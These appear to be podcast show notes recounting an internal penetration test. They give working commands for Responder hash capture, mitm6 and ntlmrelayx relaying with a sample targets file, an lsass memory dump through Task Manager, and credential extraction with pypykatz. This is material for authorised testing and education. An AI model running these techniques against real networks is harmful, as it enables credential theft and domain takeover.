7MS #423: Tales of Internal Pentest Pwnage - Part 18
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.
This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:
Responder.py -i eth0 -rPv
is AWESOME. It can make the network rain hashes like manna from heaven!- Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
- Testing for MS14-025 is easy with this site.
- mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:
smb://CORP\Administrator@192.168.195.2
smb://CORP\Administrator@192.168.195.3
smb://CORP\brian.admin@192.168.195.7
192.168.195.7
192.168.195.10
Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support
. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin
-
I ran into a weird issue with CrackMapExec where the
--local-auth
flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ! -
Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.
-
Wanna spin up a quick SMB share from your Kali box? Try
smbserver.py -smb2support share /share
-
Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:
pip3 install pypykatz
sudo pypykatz lsa minidump lsass.dmp > lsass.txt
Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!